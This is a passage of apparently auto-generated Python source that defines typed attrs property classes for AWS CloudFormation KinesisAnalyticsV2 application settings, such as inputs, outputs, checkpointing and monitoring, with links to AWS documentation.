Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-kinesisfirehoseoutput.html
Property Document:
- ``rp_ResourceARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-kinesisfirehoseoutput.html#cfn-kinesisanalyticsv2-applicationoutput-kinesisfirehoseoutput-resourcearn
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput.KinesisFirehoseOutput"
rp_ResourceARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-kinesisfirehoseoutput.html#cfn-kinesisanalyticsv2-applicationoutput-kinesisfirehoseoutput-resourcearn"""
@attr.s
class PropApplicationOutputKinesisStreamsOutput(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput.KinesisStreamsOutput"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-kinesisstreamsoutput.html
Property Document:
- ``rp_ResourceARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-kinesisstreamsoutput.html#cfn-kinesisanalyticsv2-applicationoutput-kinesisstreamsoutput-resourcearn
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput.KinesisStreamsOutput"
rp_ResourceARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-kinesisstreamsoutput.html#cfn-kinesisanalyticsv2-applicationoutput-kinesisstreamsoutput-resourcearn"""
@attr.s
class PropApplicationApplicationSnapshotConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ApplicationSnapshotConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationsnapshotconfiguration.html
Property Document:
- ``rp_SnapshotsEnabled``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationsnapshotconfiguration.html#cfn-kinesisanalyticsv2-application-applicationsnapshotconfiguration-snapshotsenabled
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ApplicationSnapshotConfiguration"
rp_SnapshotsEnabled: bool = attr.ib(
default=None,
validator=attr.validators.instance_of(bool),
metadata={AttrMeta.PROPERTY_NAME: "SnapshotsEnabled"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationsnapshotconfiguration.html#cfn-kinesisanalyticsv2-application-applicationsnapshotconfiguration-snapshotsenabled"""
@attr.s
class PropApplicationKinesisFirehoseInput(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.KinesisFirehoseInput"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisfirehoseinput.html
Property Document:
- ``rp_ResourceARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisfirehoseinput.html#cfn-kinesisanalyticsv2-application-kinesisfirehoseinput-resourcearn
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.KinesisFirehoseInput"
rp_ResourceARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisfirehoseinput.html#cfn-kinesisanalyticsv2-application-kinesisfirehoseinput-resourcearn"""
@attr.s
class PropApplicationParallelismConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ParallelismConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html
Property Document:
- ``rp_ConfigurationType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-configurationtype
- ``p_AutoScalingEnabled``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-autoscalingenabled
- ``p_Parallelism``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-parallelism
- ``p_ParallelismPerKPU``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-parallelismperkpu
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ParallelismConfiguration"
rp_ConfigurationType: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ConfigurationType"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-configurationtype"""
p_AutoScalingEnabled: bool = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(bool)),
metadata={AttrMeta.PROPERTY_NAME: "AutoScalingEnabled"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-autoscalingenabled"""
p_Parallelism: int = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(int)),
metadata={AttrMeta.PROPERTY_NAME: "Parallelism"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-parallelism"""
p_ParallelismPerKPU: int = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(int)),
metadata={AttrMeta.PROPERTY_NAME: "ParallelismPerKPU"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-parallelismperkpu"""
@attr.s
class PropApplicationMonitoringConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.MonitoringConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html
Property Document:
- ``rp_ConfigurationType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html#cfn-kinesisanalyticsv2-application-monitoringconfiguration-configurationtype
- ``p_LogLevel``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html#cfn-kinesisanalyticsv2-application-monitoringconfiguration-loglevel
- ``p_MetricsLevel``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html#cfn-kinesisanalyticsv2-application-monitoringconfiguration-metricslevel
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.MonitoringConfiguration"
rp_ConfigurationType: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ConfigurationType"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html#cfn-kinesisanalyticsv2-application-monitoringconfiguration-configurationtype"""
p_LogLevel: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "LogLevel"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html#cfn-kinesisanalyticsv2-application-monitoringconfiguration-loglevel"""
p_MetricsLevel: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "MetricsLevel"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html#cfn-kinesisanalyticsv2-application-monitoringconfiguration-metricslevel"""
@attr.s
class PropApplicationOutputDestinationSchema(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput.DestinationSchema"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-destinationschema.html
Property Document:
- ``p_RecordFormatType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-destinationschema.html#cfn-kinesisanalyticsv2-applicationoutput-destinationschema-recordformattype
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput.DestinationSchema"
p_RecordFormatType: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "RecordFormatType"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-destinationschema.html#cfn-kinesisanalyticsv2-applicationoutput-destinationschema-recordformattype"""
@attr.s
class PropApplicationCustomArtifactsConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CustomArtifactsConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactsconfiguration.html
Property Document:
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CustomArtifactsConfiguration"
@attr.s
class PropApplicationOutputLambdaOutput(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput.LambdaOutput"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-lambdaoutput.html
Property Document:
- ``rp_ResourceARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-lambdaoutput.html#cfn-kinesisanalyticsv2-applicationoutput-lambdaoutput-resourcearn
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput.LambdaOutput"
rp_ResourceARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-lambdaoutput.html#cfn-kinesisanalyticsv2-applicationoutput-lambdaoutput-resourcearn"""
@attr.s
class PropApplicationReferenceDataSourceJSONMappingParameters(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.JSONMappingParameters"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-jsonmappingparameters.html
Property Document:
- ``rp_RecordRowPath``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-jsonmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-jsonmappingparameters-recordrowpath
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.JSONMappingParameters"
rp_RecordRowPath: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RecordRowPath"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-jsonmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-jsonmappingparameters-recordrowpath"""
@attr.s
class PropApplicationCloudWatchLoggingOptionCloudWatchLoggingOption(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationCloudWatchLoggingOption.CloudWatchLoggingOption"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption.html
Property Document:
- ``rp_LogStreamARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption-logstreamarn
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationCloudWatchLoggingOption.CloudWatchLoggingOption"
rp_LogStreamARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "LogStreamARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption-logstreamarn"""
@attr.s
class PropApplicationMavenReference(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.MavenReference"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html
Property Document:
- ``rp_ArtifactId``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-artifactid
- ``rp_GroupId``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-groupid
- ``rp_Version``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-version
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.MavenReference"
rp_ArtifactId: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ArtifactId"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-artifactid"""
rp_GroupId: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "GroupId"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-groupid"""
rp_Version: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "Version"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-version"""
@attr.s
class PropApplicationKinesisStreamsInput(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.KinesisStreamsInput"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisstreamsinput.html
Property Document:
- ``rp_ResourceARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisstreamsinput.html#cfn-kinesisanalyticsv2-application-kinesisstreamsinput-resourcearn
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.KinesisStreamsInput"
rp_ResourceARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisstreamsinput.html#cfn-kinesisanalyticsv2-application-kinesisstreamsinput-resourcearn"""
@attr.s
class PropApplicationCheckpointConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CheckpointConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html
Property Document:
- ``rp_ConfigurationType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-configurationtype
- ``p_CheckpointInterval``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-checkpointinterval
- ``p_CheckpointingEnabled``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-checkpointingenabled
- ``p_MinPauseBetweenCheckpoints``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-minpausebetweencheckpoints
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CheckpointConfiguration"
rp_ConfigurationType: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ConfigurationType"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-configurationtype"""
p_CheckpointInterval: int = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(int)),
metadata={AttrMeta.PROPERTY_NAME: "CheckpointInterval"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-checkpointinterval"""
p_CheckpointingEnabled: bool = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(bool)),
metadata={AttrMeta.PROPERTY_NAME: "CheckpointingEnabled"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-checkpointingenabled"""
p_MinPauseBetweenCheckpoints: int = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(int)),
metadata={AttrMeta.PROPERTY_NAME: "MinPauseBetweenCheckpoints"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-minpausebetweencheckpoints"""
@attr.s
class PropApplicationZeppelinMonitoringConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ZeppelinMonitoringConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinmonitoringconfiguration.html
Property Document:
- ``p_LogLevel``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinmonitoringconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinmonitoringconfiguration-loglevel
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ZeppelinMonitoringConfiguration"
p_LogLevel: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "LogLevel"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-zeppelinmonitoringconfiguration.html#cfn-kinesisanalyticsv2-application-zeppelinmonitoringconfiguration-loglevel"""
@attr.s
class PropApplicationS3ContentBaseLocation(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.S3ContentBaseLocation"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentbaselocation.html
Property Document:
- ``rp_BasePath``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentbaselocation.html#cfn-kinesisanalyticsv2-application-s3contentbaselocation-basepath
- ``rp_BucketARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentbaselocation.html#cfn-kinesisanalyticsv2-application-s3contentbaselocation-bucketarn
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.S3ContentBaseLocation"
rp_BasePath: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "BasePath"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentbaselocation.html#cfn-kinesisanalyticsv2-application-s3contentbaselocation-basepath"""
rp_BucketARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "BucketARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentbaselocation.html#cfn-kinesisanalyticsv2-application-s3contentbaselocation-bucketarn"""
@attr.s
class PropApplicationInputLambdaProcessor(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.InputLambdaProcessor"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputlambdaprocessor.html
Property Document:
- ``rp_ResourceARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputlambdaprocessor.html#cfn-kinesisanalyticsv2-application-inputlambdaprocessor-resourcearn
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.InputLambdaProcessor"
rp_ResourceARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputlambdaprocessor.html#cfn-kinesisanalyticsv2-application-inputlambdaprocessor-resourcearn"""
@attr.s
class PropApplicationRecordColumn(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.RecordColumn"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html
Property Document:
- ``rp_Name``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-name
- ``rp_SqlType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-sqltype
- ``p_Mapping``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-mapping
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.RecordColumn"
rp_Name: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "Name"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-name"""
rp_SqlType: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "SqlType"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-sqltype"""
p_Mapping: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "Mapping"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordcolumn.html#cfn-kinesisanalyticsv2-application-recordcolumn-mapping"""
@attr.s
class PropApplicationCSVMappingParameters(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CSVMappingParameters"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-csvmappingparameters.html
Property Document:
- ``rp_RecordColumnDelimiter``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-csvmappingparameters.html#cfn-kinesisanalyticsv2-application-csvmappingparameters-recordcolumndelimiter
- ``rp_RecordRowDelimiter``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-csvmappingparameters.html#cfn-kinesisanalyticsv2-application-csvmappingparameters-recordrowdelimiter
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CSVMappingParameters"
rp_RecordColumnDelimiter: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RecordColumnDelimiter"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-csvmappingparameters.html#cfn-kinesisanalyticsv2-application-csvmappingparameters-recordcolumndelimiter"""
rp_RecordRowDelimiter: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RecordRowDelimiter"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-csvmappingparameters.html#cfn-kinesisanalyticsv2-application-csvmappingparameters-recordrowdelimiter"""
@attr.s
class PropApplicationGlueDataCatalogConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.GlueDataCatalogConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-gluedatacatalogconfiguration.html
Property Document:
- ``p_DatabaseARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-gluedatacatalogconfiguration.html#cfn-kinesisanalyticsv2-application-gluedatacatalogconfiguration-databasearn
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.GlueDataCatalogConfiguration"
p_DatabaseARN: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "DatabaseARN"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-gluedatacatalogconfiguration.html#cfn-kinesisanalyticsv2-application-gluedatacatalogconfiguration-databasearn"""
@attr.s
class PropApplicationJSONMappingParameters(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.JSONMappingParameters"
